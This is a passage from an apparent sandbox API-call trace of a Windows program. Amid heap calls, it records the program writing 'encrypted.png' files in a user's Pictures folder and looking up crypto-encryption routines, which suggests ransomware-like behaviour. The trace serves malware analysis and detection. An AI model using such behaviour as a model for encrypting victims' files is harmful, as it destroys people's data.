hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0041.586] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0041.586] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0041.586] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0041.586] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0041.586] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0041.586] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da378 [0041.586] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cca0 [0041.586] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0041.586] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0041.586] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0041.586] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0041.586] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0041.586] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0041.586] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da278 [0041.586] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0041.587] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0041.587] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0041.587] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5b30 [0041.587] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0041.587] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f3688 [0041.587] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0041.587] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f36e0 [0041.587] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5b30 | out: hHeap=0x770000) returned 1 [0041.587] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0041.587] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0041.587] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da278 | out: hHeap=0x770000) returned 1 [0041.587] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0041.587] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0041.587] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f3688 | out: hHeap=0x770000) returned 1 [0041.587] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0041.587] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0041.587] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0041.587] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0041.587] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f3688 [0041.587] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures")) returned 0x11 [0041.587] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f3688 | out: hHeap=0x770000) returned 1 [0041.587] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0041.587] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f36e0 | out: hHeap=0x770000) returned 1 [0041.587] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0041.587] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0041.587] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0041.587] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2240 [0041.587] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0xab2010 [0041.587] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0041.587] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0041.588] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Skh73R.encrypted.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\skh73r.encrypted.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0041.588] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1828 [0041.588] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cca0 [0041.588] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da378 [0041.588] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0041.588] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0041.588] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0041.588] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b15a8 | out: hHeap=0x770000) returned 1 [0041.588] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0041.588] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.588] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1a8 [0041.588] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b87d0 [0041.588] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0041.588] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0041.588] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0041.588] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0041.588] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2280 [0041.588] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.588] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2280 | out: hHeap=0x770000) returned 1 [0041.588] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.588] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2280 [0041.589] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.589] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1a8 [0041.589] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b15a8 [0041.589] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0041.589] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0041.589] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0041.589] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0041.589] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0041.589] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0041.589] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0041.589] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0041.589] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0041.589] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0041.589] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0041.589] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0041.589] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0041.589] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x100000) returned 0x1090020 [0041.589] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae990 | out: lpNewFilePointer=0x0) returned 1 [0041.589] ReadFile (in: hFile=0x140, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0x10000, lpOverlapped=0x0) returned 1 [0041.592] ReadFile (in: hFile=0x140, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0x1cf8, lpOverlapped=0x0) returned 1 [0041.592] ReadFile (in: hFile=0x140, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0x0, lpOverlapped=0x0) returned 1 [0041.592] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0041.592] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0041.592] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0041.592] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0041.592] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x11cf8) returned 0xac2018 [0041.593] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x1090020 | out: hHeap=0x770000) returned 1 [0041.593] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0041.594] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0041.594] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b15a8 | out: hHeap=0x770000) returned 1 [0041.594] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0041.594] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1a8 [0041.594] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x11cf8) returned 0x935008 [0041.595] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xac2018 | out: hHeap=0x770000) returned 1 [0041.595] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0041.595] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.595] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0041.595] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b15a8 [0041.596] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0041.596] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0041.596] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0041.596] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x11cf8) returned 0xac2018 [0041.596] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0041.596] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xac2018 | out: hHeap=0x770000) returned 1 [0041.596] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0041.596] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0041.596] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b15a8 | out: hHeap=0x770000) returned 1 [0041.596] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0041.596] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.596] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0041.596] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0041.596] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0041.596] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0041.597] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0041.597] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0041.597] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c22c0 [0041.597] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.597] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0041.597] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0041.597] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0041.597] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0041.597] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0041.597] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0041.597] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b15a8 [0041.597] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da1d8 [0041.597] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b98 [0041.597] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0041.597] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0041.597] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da278 [0041.597] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x11cf8) returned 0xac2018 [0041.597] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0041.597] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da188 [0041.597] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0041.597] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2e8 [0041.597] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0041.597] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da2e8 [0041.597] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0041.597] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0041.597] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0041.597] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da348 [0041.597] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0041.597] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2c8 [0041.597] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2c8 | out: hHeap=0x770000) returned 1 [0041.597] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cb20 [0041.598] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19b8 [0041.598] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0041.598] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2c8 [0041.598] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0041.598] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da298 [0041.598] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x11cf8) returned 0x946d08 [0041.599] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18c8 [0041.599] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0041.599] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0041.599] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0041.599] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1cd8 [0041.599] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0041.599] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1710 [0041.599] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0041.599] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3a8 [0041.599] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0041.599] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1800 [0041.599] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0041.599] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da368 [0041.599] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c958 [0041.599] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0041.599] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.599] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3b8 [0041.599] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0041.599] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3b8 [0041.599] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0041.599] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2300 [0041.599] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.599] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1918 [0041.599] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0041.599] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0041.599] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0041.599] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a58 [0041.599] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0041.599] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0041.599] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da328 [0041.600] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0041.600] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3f8 [0041.600] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0041.600] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0041.600] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0041.600] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3f8 | out: hHeap=0x770000) returned 1 [0041.600] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b48 [0041.600] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da3f8 [0041.600] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19e0 [0041.600] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0041.600] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da408 [0041.600] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0041.600] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cd90 [0041.600] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a30 [0041.600] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0041.600] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da408 [0041.600] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0041.600] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b20 [0041.600] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0041.600] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0041.600] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0041.600] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1698 [0041.600] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0041.600] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0041.600] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0041.600] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0041.600] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0041.600] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0041.600] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1af8 [0041.600] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0041.600] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2b8 [0041.600] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd00 [0041.600] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2b8 | out: hHeap=0x770000) returned 1 [0041.600] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae988 [0041.601] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2b8 [0041.601] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1940 [0041.601] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0041.601] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e138 [0041.601] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0041.601] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3c8 [0041.601] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0041.601] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0041.601] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0041.601] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da148 [0041.601] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0041.601] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3e8 [0041.601] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0041.601] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2f8 [0041.601] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0041.601] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2f8 | out: hHeap=0x770000) returned 1 [0041.601] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0041.601] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3e8 | out: hHeap=0x770000) returned 1 [0041.601] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0041.601] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0041.601] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da148 [0041.601] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 